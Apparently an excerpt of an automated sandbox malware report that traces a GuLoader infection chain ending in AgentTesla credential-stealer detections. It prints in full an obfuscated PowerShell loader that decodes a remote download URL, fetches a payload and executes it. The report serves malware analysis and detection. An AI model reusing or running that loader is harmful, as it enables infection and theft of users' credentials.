;$Infection=$forenoon[$Ekspertgruppe];}Exuberate (Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. ');Exuberate (Fritidsmuligheds 'Skrat$knowlg Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv ');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv] Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;"
                                                                          Imagebase:0x7ff760310000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2049632681.000002259006D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:06:46:04
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff70f010000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:12
                                                                          Start time:06:46:06
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
                                                                          Imagebase:0x7ff6f0380000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:13
                                                                          Start time:06:46:14
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate (Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto StoknSprini,vistsSul.okRecon. V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp .ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit ');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat, un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate (Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety ');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. ');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds 'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') ;$Infection=$forenoon[$Ekspertgruppe];}Exuberate (Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. ');Exuberate (Fritidsmuligheds 'Skrat$knowlg Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv ');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv] Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;"
                                                                          Imagebase:0xba0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.1846945449.0000000009760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.1847193868.000000000ACC4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.1835301736.00000000059E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:14
                                                                          Start time:06:46:15
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
                                                                          Imagebase:0xc50000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:18
                                                                          Start time:06:46:42
                                                                          Start date:24/04/2024
                                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                          Imagebase:0x40000
                                                                          File size:516'608 bytes
                                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2590450166.00000000220F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:22
                                                                          Start time:06:47:13
                                                                          Start date:24/04/2024
                                                                          Path:C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
                                                                          Imagebase:0x5f0000
                                                                          File size:516'608 bytes
                                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 0%, ReversingLabs
                                                                          • Detection: 0%, Virustotal, Browse
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:23
                                                                          Start time:06:47:13
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                          Imagebase:0x7ff787cc0000
                                                                          File size:71'680 bytes
                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:24
                                                                          Start time:06:47:21
                                                                          Start date:24/04/2024
                                                                          Path:C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
                                                                          Imagebase:0x5f0000
                                                                          File size:516'608 bytes
                                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Executed Functions

                                                                            Function 00007FF8883ECF51 Relevance: .4, Instructions: 398COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2093882569.00007FF8883E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8883E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ff8883e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dcc59cbad4f8cefab54df08a1d82a2ab24a30d895797c92ad9bb894cda690aad
                                                                            • Instruction ID: 4c5c0f7b69b4f129501fa27ad116e3a9365e01fd8b30b5fa7f3a13c0c7fa1170
                                                                            • Opcode Fuzzy Hash: dcc59cbad4f8cefab54df08a1d82a2ab24a30d895797c92ad9bb894cda690aad
                                                                            • Instruction Fuzzy Hash: 98D17030A18A4E8FEBA8DF2CD8557E977D1FB58340F14426AE80DC7695DF389941CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00007FF8883EDD01 Relevance: .4, Instructions: 381COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2093882569.00007FF8883E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8883E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ff8883e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 59dd41923d99f78cc68b0df9785f6771ce0fef58b6de65e93c7e086253291694
                                                                            • Instruction ID: a563520c4e1cef54d1cbe4afd630c08dab7fa5fbeafd078b3b76f49583327325
                                                                            • Opcode Fuzzy Hash: 59dd41923d99f78cc68b0df9785f6771ce0fef58b6de65e93c7e086253291694
                                                                            • Instruction Fuzzy Hash: 7CD17130A18A4D8FEBA8DF28C8557E977D1FB94350F14826ED80DC7695CF789940CB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00007FF8884B4B35 Relevance: .4, Instructions: 439COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2094802796.00007FF8884B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8884B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ff8884b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e68dd9d42178d34b6e89489486e817ce67115c549ea5cfb5722cdd312c0da1a2
                                                                            • Instruction ID: 01a585b78a9635a6a6f0d90cdcde8a22e99eea5fc4091f4bcd0328d44b36825c
                                                                            • Opcode Fuzzy Hash: e68dd9d42178d34b6e89489486e817ce67115c549ea5cfb5722cdd312c0da1a2
                                                                            • Instruction Fuzzy Hash: 7DD12332D4DACA4FE796DAA898556B97BA0FF51390F0901FED04DCB1D3DA18AC01C346
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00007FF8883E3945 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2093882569.00007FF8883E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8883E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ff8883e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction ID: 6a6846a1170be204d6491bac246cb17ad8b5f4e9a7921e76151924442626c0a7
                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction Fuzzy Hash: 2A01677111CB0D4FDB44EF4CE451AA5B7E0FB99364F10056DE58AC36A1D736E881CB46
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 00007FF8883E87D3 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2093882569.00007FF8883E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8883E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ff8883e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: K_^$K_^$K_^$K_^$K_^
                                                                            • API String ID: 0-3188868157
                                                                            • Opcode ID: 99baef2207ad6efce2ab439b82b9b5f9342fd1fa05e3152bf8f6dc0c64401980
                                                                            • Instruction ID: b7453015826fabd043a02adabf3c565e83fa1cfc76f69db0b7371c5d2cad1d43
                                                                            • Opcode Fuzzy Hash: 99baef2207ad6efce2ab439b82b9b5f9342fd1fa05e3152bf8f6dc0c64401980
                                                                            • Instruction Fuzzy Hash: B731B39BD0DBD64FE762561898E90E52F90BF222A4F4D00F6CCA84B593FE081817D716
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Executed Functions

                                                                            Function 0750E145 Relevance: .7, Instructions: 704COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 49fdc72015437ec242f9f6bdeca7caa778a075f65a0bcabf8a0562ae7da337b6
                                                                            • Instruction ID: efd46c61ac7fd34374c0addaa6eaac0b1f347d73c3b270cc5ee19e55a2f4594e
                                                                            • Opcode Fuzzy Hash: 49fdc72015437ec242f9f6bdeca7caa778a075f65a0bcabf8a0562ae7da337b6
                                                                            • Instruction Fuzzy Hash: CE626EB4A002189FEB24DB14C955BDDB7B2BF88304F6084EAD9096F781DB759E81CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07508848 Relevance: 13.5, Strings: 10, Instructions: 1030COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl$H:t$H:t
                                                                            • API String ID: 0-2670215381
                                                                            • Opcode ID: 86ded5ca44b96b5a4f4cf0f19aa412a4cf8d1f4bffed5327e1e33e44322ae6aa
                                                                            • Instruction ID: 74d98385307ed101f5f062d264c3be7eeed2ad6051f296fc25a3204cfccd0aab
                                                                            • Opcode Fuzzy Hash: 86ded5ca44b96b5a4f4cf0f19aa412a4cf8d1f4bffed5327e1e33e44322ae6aa
                                                                            • Instruction Fuzzy Hash: E4829FB4B00205DFDB24DB58C851BAAB7B2BF85310F24C4AAD509AF795DB71EC81CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07507738 Relevance: 13.4, Strings: 10, Instructions: 933COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl$84l$84l
                                                                            • API String ID: 0-252953923
                                                                            • Opcode ID: 39161ebaf035a1e08ac4af7ce3ae998d164454f708b5c2d515205dea8b9f3cde
                                                                            • Instruction ID: 366e3df84e2dd784d30bfb0f3287a68cddd109ae5ceb8028b50951072a52ec81
                                                                            • Opcode Fuzzy Hash: 39161ebaf035a1e08ac4af7ce3ae998d164454f708b5c2d515205dea8b9f3cde
                                                                            • Instruction Fuzzy Hash: 698280B4B00215CFDB24CB98C951B9AB7B2BF89314F24C46AD9099F395DB72EC41CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 075080ED Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fl$(fl$(fl
                                                                            • API String ID: 0-3144609269
                                                                            • Opcode ID: 9abeb1ea0a51183e32e9128fcb3a9cfde873edd1a8c224659b3028684edf37b9
                                                                            • Instruction ID: 21fd4fee017793b6831e042469a6d1d97ec59458e3f7d8ad5f94a16f4a4983d5
                                                                            • Opcode Fuzzy Hash: 9abeb1ea0a51183e32e9128fcb3a9cfde873edd1a8c224659b3028684edf37b9
                                                                            • Instruction Fuzzy Hash: D4125CB4A00215DFDB24CB98C550F99B7B2BF88314F28C45AD9099F795DB72EC46CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0750F579 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fl$(fl
                                                                            • API String ID: 0-1194790885
                                                                            • Opcode ID: 702d8bdcb6101e46380990059823efdd6e74ada1d462467209682f2feed57d71
                                                                            • Instruction ID: be1bf1f424f6077bfeb248cb3921eea1a77d14dca1834e255714550c41b6f2a9
                                                                            • Opcode Fuzzy Hash: 702d8bdcb6101e46380990059823efdd6e74ada1d462467209682f2feed57d71
